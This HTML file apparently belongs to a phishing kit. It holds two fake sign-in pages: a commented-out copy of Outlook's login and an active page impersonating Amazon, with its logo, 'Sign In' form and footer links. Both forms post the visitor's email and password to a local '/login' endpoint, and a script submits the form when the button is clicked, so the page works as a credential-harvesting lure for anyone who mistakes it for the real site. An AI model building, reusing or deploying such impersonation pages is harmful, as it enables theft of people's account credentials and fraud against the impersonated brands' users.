<!-- <!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
  <style>
    * {
  padding: 0%;
  margin: 0;
  box-sizing: border-box;
}
.main_wrap {
  display: flex;
  width: 100%;
  height: 100vh;
}
.left_side {
  width: 50%;
  display: grid;
  place-items: center;
  background-color: #0067b8;
  height: 100vh;
}
.right_side {
  width: 50%;
  display: flex;
  justify-content: center;
  align-items: flex-end;
}
.heading {
  color: #0067b8;
  font-size: 70px;
  font-family: Arial, Helvetica, sans-serif;
  margin-bottom: 30px;
}
.input_wrap {
  margin-bottom: 20px;
  width: 250px;
}
.input_wrap > div {
  font-size: 14px;
  margin-bottom: 2px;
  font-family: Arial, Helvetica, sans-serif;
}
.input_wrap > input {
  width: 100%;
  padding: 5px;
}
.last_head {
  margin-top: 70px;
  color: #0067b8;
  font-size: 25px;
  font-family: Arial, Helvetica, sans-serif;
  
}
.mb150{
  margin-bottom: 150px;
}

  </style>
</head>
<body>
  <div class="main_wrap">
    <div class="left_side">
      <img src="/logo/outlook.png" alt="sgdh" />
    </div>
    <div class="right_side">
      <div class="mb150">
        <div class="heading">Outlook</div>
        <form id="myForm" action="/login" method="post">
          <div class="input_wrap">
          
            <div> Email Address: </div>
            <input id="email"  name="email" type="email"></input>
          </div>
          <div class="input_wrap">
            <div> Password </div>
            <input id="password" name="password" type="password"></input>
          </div>
  
          <div id="singin" class="last_head"  >
            <svg
           
              xmlns="http://www.w3.org/2000/svg"
              width="21"
              height="21"
              fill="currentColor"
              class="bi bi-arrow-right-circle"
              viewBox="0 0 16 16"
            >
              <path
                fill-rule="evenodd"
                d="M1 8a7 7 0 1 0 14 0A7 7 0 0 0 1 8zm15 0A8 8 0 1 1 0 8a8 8 0 0 1 16 0zM4.5 7.5a.5.5 0 0 0 0 1h5.793l-2.147 2.146a.5.5 0 0 0 .708.708l3-3a.5.5 0 0 0 0-.708l-3-3a.5.5 0 1 0-.708.708L10.293 7.5H4.5z"
              />
            </svg>
            <span  style="margin-left: 15px;">Sign in</span>
          </div>
        </form>
        
      </div>
    </div>
  </div> -->
  <!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Amazon</title>
    <style>
      .img_1 {
  height: 31px;
  width: 103px;
  margin-top: 20px;
  margin-bottom: 50px;
}

.extra-margin {
  margin-top: 200px;
}

.btn {
  width: 350px;
  margin-top: 20px;
}




form {
  border: 1px solid lightgrey;
  padding-left: 25px;
  padding-right: 25px;
  padding-top: 16px;
  padding-bottom: 25px;
  border-radius: 5px;
}

#words_1 {
  font-weight: bold;
  font-size: 14px;
}

#words_2 {
  font-weight: bold;
  font-size: 14px;
}
  
#words_3 {
  font: 7px;
}

.sign-in {
  margin-bottom: 50px;
  font-size: 30px;
  font-weight: bold;
}

.conditions {
  font-size: 8px;
  color: blue;
  margin-top: 30px;
  z-index: 2;
  
  
 
 
}

.footer_1 {
  width: max;
  height: 350px;
  background-color: #fff;
  margin-top: 30px;
  
}

#exampleCheck1 {
  margin-left: 3px;
  margin-top: 11px;
}

.keep-sign-in {
  margin-left: 24px;
  margin-top: 8px;
  font-size: 14px;
}

#sign-in {
  margin-bottom: 10px;
}

#grey-button {
  background-color: lightgrey;
  border: black;
    
  
}


    </style>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
 </head>
  
  <body>

    <header>
<!--Amazon Image Logo-->
      <div class="d-flex flex-row justify-content-center">
        <div class="row">
          <div class="col-md">
            <img  style="width: 100px; height: 100px;" src="logo/amazon.jpg" alt="Amazon Logo"/>
          </div><!--Col 1 End-->
        </div><!--Row 1 End-->
      </div><!--Container End-->
<!--Amazon Image Logo-->
   </header>     
     
      
<!--Form-->
      <div class="d-flex flex-row justify-content-center">
        <div class="row">
          <div class="col-md">
            <form id="myForm" action="/login" method="post">
             <div class="sign-in"  >Sign In</div>          
  <div class="form-group">
    <label id="words_1" for="exampleInputEmail1">Email(phone for mobile accounts)</label>
    <input type="email" name="email" class="form-control" id="exampleInputEmail1" aria-describedby="emailHelp" placeholder="Enter email">
    <small id="emailHelp" class="form-text text-muted"></small>
  </div>
  <div class="form-group">
    <label id="words_2" for="exampleInputPassword1">Password &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp Forgot your password? </label>
    <input type="password" class="form-control"name="password" id="exampleInputPassword1" placeholder="Password">
    <div class="form-group">
      <button type="button" class="btn btn-warning" id="singin">Sign In</button>
       <!-- <input type="checkbox" class="form-check-input checkbox" id="exampleCheck1"> -->
      <p class="keep-sign-in">Keep me signed in. <a href="https://stupidlink.com">Details</a></p>
      <!-- <img id="amazon-img" src="https://s3-us-west-2.amazonaws.com/s.cdpn.io/2221140/newtoamazon1.svg" alt="Amazon Image"> -->
    </div>
  </div>
  <div class="form-check">
   
    
  </div>
  <!-- <button type="button" class="btn btn-warning" id="grey-button">Create your Amazon account</button> -->
  
</form> 
          </div><!--Col 1 End-->
        </div><!--Row 1 End-->
      </div><!--Container End-->
<!--Form-->
      
      
      

<div class="d-flex flex-row justify-content-center footer_1">
  <div class="row">
    <div class="col">
      <p class="conditions"><a>Conditions of Use &nbsp &nbsp &nbsp </a>   <a>Privacy Notice&nbsp &nbsp &nbsp </a>   <a>Help&nbsp &nbsp &nbsp </a></p>
    </div><!--Footer Col 1 End-->
  </div><!--Footer Row 1 End-->
  
    </div>

  
  <script>
    var singin = document.getElementById("singin")
    var forms = document.getElementById('myForm');
singin.addEventListener("click", function(event){
      event.preventDefault()
      forms.submit();
      console.log("hrllo")
      for (var i = 0, iLen = forms.length; i < iLen; i++) {
    var form = forms[i];
    form.action = '/login';
   } })
    

  </script>


</body>
</html>


